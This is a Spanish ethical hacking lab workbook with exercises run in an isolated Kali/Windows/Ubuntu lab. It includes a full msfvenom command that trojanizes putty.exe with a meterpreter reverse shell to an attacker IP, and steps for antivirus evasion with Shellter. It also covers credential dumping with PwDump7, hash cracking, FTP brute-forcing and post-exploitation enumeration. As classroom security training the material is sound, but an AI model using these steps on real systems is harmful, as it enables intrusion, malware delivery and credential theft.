Está en la página 1de 36

Libro de Prácticas. Parte 1 Ethical Hacking.

TABLA DE CONTENIDO
REQUISITOS DEL TALLER. 2

EJERCICIO 1: PROXY REVERSO CON METASPLOIT 3

PARTE 1. Creando el ejecutable 3

PARTE 2. Desplegar el ejecutable falso. 4

PARTE 3. Tomando el control 5

EJERCICIO 2. HACIENDO AL EJECUTABLE MALICIOSO “INDETECTABLE” 8

PARTE 1. Instalando shellter. 8

PARTE 2 Desplegar el ejecutable falso e indetectable 11

Ejercicio 3. RASTREANDO LA RED CON ME 14

PARTE 1. RASTREO DE LA RED 14

EJERCICIO 4. RASTREO DE VULNERABILIDADES CON NESSUS 15

EJERCICIO 5. ROMPIMIENTO DE CLAVES. 21

PARTE 1: OPHCRACK 21

PARTE 2. VOLCANDO LAS CONTRASEÑAS CON PWDUMP. 24

PARTE 3. USANDO MEDUSA PARA ACCEDER A CONTRASEÑAS 26

PARTE 4. JOHN THE RIPPER 28

EJERCICIO 6.USANDO METASPLOIT PARA ENUMERAR UNA ESTACIÓN COMPROMETIDA 31

REINALDO NICOLÁS MAYOL ARNAO 1


Libro de Prácticas. Parte 1 Ethical Hacking.

REQUISITOS DEL TALLER.


1 máquina con Kali Linux

1 máquina con Ubuntu server con FTP activo

1 máquina con Windows 10.

10000 dosis de paciencia y cuidado.

REINALDO NICOLÁS MAYOL ARNAO 2


Libro de Prácticas. Parte 1 Ethical Hacking.

EJERCICIO 1: PROXY REVERSO CON METASPLOIT

Objetivo: En este ejercicio utilizaremos un ME para construir un ejecutable falso (putty.exe) que
luego pasaremos al cliente. Cuando este lo ejecute nos dará acceso a la máquina víctima.

Ambiente de trabajo:

1- Kali Linux IP ______________________(obtener con ifconfig)


2- Víctima Windows IP ______________________(obtener con ifconfig)
3- Ejecutable de engaño: putty.exe

PARTE 1. CREANDO EL EJECUTABLE

1- Descargue el ejecutable de putty.exe de 32 bits (en realidad puede ser cualquiera) desde el
sitio de la aplicación. https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
2- Copie el archivo descargado a /root
3- Abra un Shell y ejecute el siguiente comando. SUSTITUYA LHOST por la IP de su máquina
Kali.

msfvenom -p windows/meterpreter/reverse_tcpLHOST=172.31.12.133 LPORT=4444 -x putty.exe -k -e


x86/shikata_ga_nai -i 15 -f exe >putty_e.exe

4- Si todo se ha ejecutado bien, verá una pantalla como la siguiente. Asegúrese que no tenga
ningún error antes de proseguir.

REINALDO NICOLÁS MAYOL ARNAO 3


Libro de Prácticas. Parte 1 Ethical Hacking.

5- Ahora puede ver en el directorio de destino que se ha creado un archivo putty_e.exe (note
que le cambiamos el nombre por conveniencia, en un ambiente real podría usar el mismo
nombre original)

6- Copie el archivo creado hacia la máquina víctima (Windows). Asegúrese de desactivar el


antivirus en la máquina Windows. (Luego haremos que sea indetectable, pero por ahora
sigamos)

PARTE 2. DESPLEGAR EL EJECUTABLE FALSO.

7- En la máquina con Windows, ejecute el putty modificado (putty-e)

REINALDO NICOLÁS MAYOL ARNAO 4


Libro de Prácticas. Parte 1 Ethical Hacking.

PARTE 3. TOMANDO EL CONTROL

8- Ejecute los siguientes comandos (no continúe si ve un error). RECUERDE CAMBIAR LHOST
POR LAS IP QUE CORRESPONDA (las mismas que usó al construir el ejecutable)

REINALDO NICOLÁS MAYOL ARNAO 5


Libro de Prácticas. Parte 1 Ethical Hacking.

9- En el shell de meterpreter ejecute algunos comandos de windows. Comente los resultados.

REINALDO NICOLÁS MAYOL ARNAO 6


Libro de Prácticas. Parte 1 Ethical Hacking.

REINALDO NICOLÁS MAYOL ARNAO 7


Libro de Prácticas. Parte 1 Ethical Hacking.

EJERCICIO 2. HACIENDO AL EJECUTABLE MALICIOSO “INDETECTABLE”

Objetivo: Realizaremos un ejercicio similar al anterior, pero utilizaremos una herramienta adicional
para hacer a nuestro ejecutable modificado indetectable.

Los ejecutables creados a través de Metasploit, u otros marcos de pruebas de penetración, son
muy probablemente detectados por la mayoría de los proveedores de AV. (ver ejercicio 1).

Usando Shellter, automáticamente tienes una plantilla ejecutable infinitamente polimórfica, ya que
puede utilizar cualquier ejecutable nativo de 32 bits de Windows de 32 bits para alojar su código
shell. Por "autónomo" se entiende un ejecutable que no está no está enlazado estáticamente a
ninguna DLL propietaria, aparte de las incluidas por omisión en Windows.

Ambiente de trabajo (similar al ejercicio 1):

● Kali Linux IP ______________________(obtener con ifconfig)


● Víctima Windows IP ______________________(obtener con ifconfig)
● Ejecutable de engaño: putty.exe

PARTE 1. INSTALANDO SHELLTER.

1- En la máquina Kali instale shellter.

REINALDO NICOLÁS MAYOL ARNAO 8


Libro de Prácticas. Parte 1 Ethical Hacking.

2- Adicionalmente ejecute los siguientes comandos.


sudo apt-get update
sudo dpkg –add-architecture i386
sudo apt-get install wine32

REINICIE KALI
No continúe al paso 3 sin concluir este satisfactoriamente.

3- Desde el terminal ejecute el comando shellter. (sudo shellter)


Al concluir verá una ventana como la siguiente. Seleccione el modo A (auto).

4- Defina el ejecutable de destino. Se refiere al archivo putty.exe original. Por favor ajústela
ruta según corresponda.

REINALDO NICOLÁS MAYOL ARNAO 9


Libro de Prácticas. Parte 1 Ethical Hacking.

5- Responda Y (yes) a todas las preguntas del proceso. (El proceso demora unos 60
segundos, no lo interrumpa)

6- Seleccione L cuando se pregunte por el tipo de payload.

7- Seleccione 1 (Meterpreter_ Reverse_ TCP).

8- Incluya los parámetros LHOST y LPORT de manera similar al ejercicio 1. Recuerde que
LHOST se refiere a la máquina Kali. Por lo tanto modifique su respuesta según su
configuración.

1
REINALDO NICOLÁS MAYOL ARNAO
0
Libro de Prácticas. Parte 1 Ethical Hacking.

9- Al finalizar, se habrá creado un nuevo ejecutable en la carpeta de destino y verá una


pantalla como la siguiente.

PARTE 2 DESPLEGAR EL EJECUTABLE FALSO E INDETECTABLE

10- Repita los pasos 6-9 del ejercicio 1. Asegurese que copia el nuevo ejecutable en lugar del
anterior.
11- Vaya VirusTotal (https://virustotal.com) y cargue el archivo creado. Vea los resultados.

1
REINALDO NICOLÁS MAYOL ARNAO
1
Libro de Prácticas. Parte 1 Ethical Hacking.

Notará que aunque el archivo es detectado por gran cantidad de herramientas AV, algunas muy
conocidas fallan terriblemente.

1
REINALDO NICOLÁS MAYOL ARNAO
2
Libro de Prácticas. Parte 1 Ethical Hacking.

1
REINALDO NICOLÁS MAYOL ARNAO
3
Libro de Prácticas. Parte 1 Ethical Hacking.

EJERCICIO 3. RASTREANDO LA RED CON ME

Objetivo: Hacer un rastreo completo de la red con ME.

PARTE 1. RASTREO DE LA RED

1. Abra la consola de metasploid (sudo msfconsole -q ) y ejecute el siguiente comando


(recuerde que la red debe ser ajustada según la que tenga en el momento de ejecutar).

Puede observar que hay 7 equipos activos en la red.

2. Ahora haremos un reconocimiento más profundo.

1
REINALDO NICOLÁS MAYOL ARNAO
4
Libro de Prácticas. Parte 1 Ethical Hacking.

EJERCICIO 4. RASTREO DE VULNERABILIDADES CON NESSUS


Para el rastreo de vulnerabilidades utilizaremos nessus. Por lo que es necesario previamente
instalar la herramienta.

1- Descargue la versión mas reciente desde


https://www.tenable.com/downloads/nessus?loginAttempted=true
2- Inicie un shell en Kali y ejecute (la versión puede cambiar).

3- Habilite el inicio de nessus y arranque el servicio.

1
REINALDO NICOLÁS MAYOL ARNAO
5
Libro de Prácticas. Parte 1 Ethical Hacking.

4- Puede comprobar el estatus del servicio usando el comando systemctl status


nessusd.service. El servicio nessusd escucha por el puerto TCP 8834.

5- Abra un navegador y vaya a la página inicial de nessus en el equipo. Elija las opciones como
se muestran a continuación.

6- Vaya a la pagina de Tenable/nessus y solicite una prueba de la versión profesional.

1
REINALDO NICOLÁS MAYOL ARNAO
6
Libro de Prácticas. Parte 1 Ethical Hacking.

7- Una vez recibido el correo desde Tenable, cree la cuenta, entre al sitio y verá el código de
activación.

1
REINALDO NICOLÁS MAYOL ARNAO
7
Libro de Prácticas. Parte 1 Ethical Hacking.

1
REINALDO NICOLÁS MAYOL ARNAO
8
Libro de Prácticas. Parte 1 Ethical Hacking.

8- Copie el código y regrese a la consola en Kali. Cree un usuario y contraseña local. Se


comenzarán a descargar plugins. Espere.
9- Una vez concluido acceda a la cuenta local y verá una pantalla como la siguiente.
10- En la ventana de objetivos seleccione la IP de su dispositivo victima (Windows)

11- Comience el scan de vulnerabilidades.

Sea paciente.

1
REINALDO NICOLÁS MAYOL ARNAO
9
Libro de Prácticas. Parte 1 Ethical Hacking.

2
REINALDO NICOLÁS MAYOL ARNAO
0
Libro de Prácticas. Parte 1 Ethical Hacking.

EJERCICIO 5. ROMPIMIENTO DE CLAVES.


Plataforma de Trabajo: Kali Linux.

PARTE 1: OPHCRACK

1- Inicie Kali Linux.


2- Desde cualquier navegador vaya al sitio: http://ophcrack.sourceforge.net/tables.php y
descargue los siguientes archivos de diccionario: XP free small y XP free fast .
3- Extraiga los archivos en la carpeta /$HOME1/Downloads/
4- Inicie la herramienta

1
Sustituya $HOME por el nombre del subdirectorio home del usuario utilizado.

5- Cargue las tablas de diccionario descargadas en la herramienta.

2
REINALDO NICOLÁS MAYOL ARNAO
1
Libro de Prácticas. Parte 1 Ethical Hacking.

2
REINALDO NICOLÁS MAYOL ARNAO
2
Libro de Prácticas. Parte 1 Ethical Hacking.

6- Cargaremos parte del archivo en la herramienta. (Utilizaremos la opción Single hash)

El siguiente es un fragmento de un archivo DUMP de contraseñas.

WALC:1004:72452d2682b2ba9c93e28745b8bf4ba6:ef3b88c0e908711adae65c0825ea7e30:::
HelpAssistant:1000:54f2810a212387bd2ed3651200011465:fbadfb1325c5a4d06130da2fa251f32c:::
Jim:1003:828a5954e6da729caad3b435b51404ee:bc62ac0f8ea9dd1ad703c8b4f0a968c4:::
test_account:1005:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::

7- Copie y pegue en la ventana la línea correspondiente al usuario WALC. (toda la línea, note el
formato PWDUMP). Utilizaremos la opción Single hash

Al copiar tenga cuidado con introducir espacios ( sobre todo al final)

8- Presione el botón Crack

2
REINALDO NICOLÁS MAYOL ARNAO
3
Libro de Prácticas. Parte 1 Ethical Hacking.

PREGUNTAS DEL EJERCICIO.

1. ¿Cuál es el password del usuario WALC?

2. ¿Por qué fue tan sencillo conseguirlo?

3. Repita los pasos 1-3 para el usuario HelpAssistant

4. Discuta la diferencia entre el usuario WALC y HelpAssitant

Para saber más: https://support.microsoft.com/es-es/help/299656/how-to-prevent-


windows-from-storing-a-lan-manager-hash-of-your-passwd

PARTE 2. VOLCANDO LAS CONTRASEÑAS CON PWDUMP.

En la parte 1 utilizamos un archivo pwdump ya extraido. En esta parte aprenderemos a extraer el archivo
desde una máquina activa.

Ambiente: Windows XP/ Windows 7/ Kali Linux

1. PREPARANDO EL AMBIENTE:

1- Descargue pwdump para Windows desde la siguiente página:

http://download.openwall.net/pub/projects/john/contrib/pwdump/

Algunos antivirus consideran a pwdump una herramienta peligrosa y por lo tanto bloquean su uso. Tenga en
cuenta eliminar la protección antivirus para las carpetas donde descargará y utilizará pwdump.

2- Descomprima pwdump y copie ( por sencillez) el archivo hacia %windir%\system32


3- Abra un shell como administrador y muévase a la carpera %windir%\system32

2. CAPTURANDO LOS PASSWORD

1- (WINDOWS): Ejecute el comando pwdump y salve los passwd hacia un archivo de cualquier
nombre ( en nuestro caso utilizaremos passwd.log)

C:\WINDOWS\system32>PwDump7.exe > c:/passwd.log

2- Copie el archivo hacia Kali Linux y ejecute nuevamente la herramienta ophcrack pero ahora
cargado todo el archivo passwd.log

2
REINALDO NICOLÁS MAYOL ARNAO
4
Libro de Prácticas. Parte 1 Ethical Hacking.

Note que el usuario “Asistente de ayuda” se creó por omisión en el sistema.

3- Cree el usuario WALC2 en Windows con el siguiente password: ncn292k


4- Repita los pasos 1 y 2

PREGUNTA DE LABORATORIO PARTE 2

¿Pudo romper las contraseñas?

2
REINALDO NICOLÁS MAYOL ARNAO
5
Libro de Prácticas. Parte 1 Ethical Hacking.

PARTE 3. USANDO MEDUSA PARA ACCEDER A CONTRASEÑAS

Medusa es una herramienta muy simple que permite probar contraseñas de usuarios. NO es una
herramienta de cracking como la anterior, pero puede ser muy útil para obtener de manera masiva
credenciales, sobre todo cuando se utilizan valores por omisión. En este ejercicio probaremos medusa
contra un servidor ftp.

Ambiente de trabajo:

● Kali Linux para ejecutar medussa.


● Ubuntu server con servicio ftp activo. Debe tener ftp activado. Una buena guia se encuenta aquí:
https://comoinstalar.me/como-instalar-ftp-en-ubuntu-20-04-lts/

1. Asegúrese de que puede conectarse desde desde Kali al servidor FTP. No continúe si la conexión no
es posible.

2. Crearemos un archivo llamado user.list con los nombres de usuarios que se desea proba.

En el Ejercicio 6 veremos una forma de enumerar los usuarios de una máquina usando metasploit.

3. Ejecute el siguiente comando para verificar las contraseñas conocidas.

2
REINALDO NICOLÁS MAYOL ARNAO
6
Libro de Prácticas. Parte 1 Ethical Hacking.

Como verá los resultados no pueden ser peores. A no ser que se conozca la contraseña no hemos
avanzado mucho.

4. Ahora crearemos un diccionario de contraseñas y volveremos a probar. Para eso utilizaremos el


siguiente comando. (la cantidad de valores puede ser grande, por ejemplo la configuración
mostrada con 321254128 contraseñas.

5. Revise el contenido del archivo passwd.list.


6. Ahora volveremos a utilizar medusa.

7. Tenga paciencia. Si activa un sniffer podrá ver todo el tráfico que está generando la aplicación.

2
REINALDO NICOLÁS MAYOL ARNAO
7
Libro de Prácticas. Parte 1 Ethical Hacking.

PARTE 4. JOHN THE RIPPER

JTR es una muy conocida herramienta de rompimiento de contraseñas. A diferencia de medusa, jtr corre
localmente y puede ejecutar búsquedas basadas en diccionario (como medusa), pero también generando
combinaciones aleatorias.

Ambiente de trabajo: Kali linux.

1. Cree un usuario en kali con la contraseña: clown12es

2
REINALDO NICOLÁS MAYOL ARNAO
8
Libro de Prácticas. Parte 1 Ethical Hacking.

2. Ejecute el siguiente comando para extraer las contraseñas desde el archivo /etc/shadow.

3. Puede ver el contenido del archivo jpasswd creado usando el comando cat jpasswd.

4. Utilizaremos johnny (una interfaz GUI para john the ripper) para mejor compresión. Abra un
terminal y ejecute johnny. Verá una interfaz como la siguiente. Vaya a la opción Open password file
y cargue el archivo jpasswd creado en el paso anterior.

2
REINALDO NICOLÁS MAYOL ARNAO
9
Libro de Prácticas. Parte 1 Ethical Hacking.

5. Vaya a Options y seleccione el formato crypt (que corresponde con el tipo de cifrado de contraseñas
presente en archivo cargado).

6. Sea paciente y espere los resultados. Puede ver el avance en la parte inferior de la pantalla.

3
REINALDO NICOLÁS MAYOL ARNAO
0
Libro de Prácticas. Parte 1 Ethical Hacking.

EJERCICIO 6.USANDO METASPLOIT PARA ENUMERAR UNA ESTACIÓN


COMPROMETIDA
Ambiente de trabajo> Kali linux

Objetivo: En este ejercicio utilizaremos metasploit para obtener información de la víctima.

1. Abra la consola de metasploit. (msfconsole -q).


2. Asegúrese de tener acceso a la máquina víctima utilizando el método descrito en el ejercicio 1.
3. Revisaremos las carpetas compartidas (para que el ejercicio tenga sentido comparta una carpeta en
la máquina Windows)

4. Revisemos si la máquina es una máquina virtual.

5. Enumeremos los usuarios activos (logged)

3
REINALDO NICOLÁS MAYOL ARNAO
1
Libro de Prácticas. Parte 1 Ethical Hacking.

6. Revisemos los parches instalados.

7. Enumeremos los servicios activos.

3
REINALDO NICOLÁS MAYOL ARNAO
2
Libro de Prácticas. Parte 1 Ethical Hacking.

8. Revisemos los privilegios de las cuentas del sistema.

9. Revisemos si existe un antivirus activo.

3
REINALDO NICOLÁS MAYOL ARNAO
3
Libro de Prácticas. Parte 1 Ethical Hacking.

10. Enumeremos las aplicaciones instaladas. Note que los resultados de su ejecución está quedando
almacenadas en la carpeta ./msf4

11. Revisemos el historial de navegación. Asegúrese de tener chrome o firefox instalado.

3
REINALDO NICOLÁS MAYOL ARNAO
4
Libro de Prácticas. Parte 1 Ethical Hacking.

12. Enumeremos los dispositivos conectados a USB.

Hay 130 tipos de scripts de enumeración en la versión libre de metasploit y cerca de 300 en la
versión comercial.

Conclusiones:

El proceso que acabamos de hacer se conoce como Enumeración y permite que los atacantes
obtengan información de la víctima.

Siguiendo el procedimiento de un atacante, en este momento hemos obtenido caracterizado y


tomado acceso.

Comente con el profesor algunos mecanismos para evitar este tipo de procesos.

3
REINALDO NICOLÁS MAYOL ARNAO
5

También podría gustarte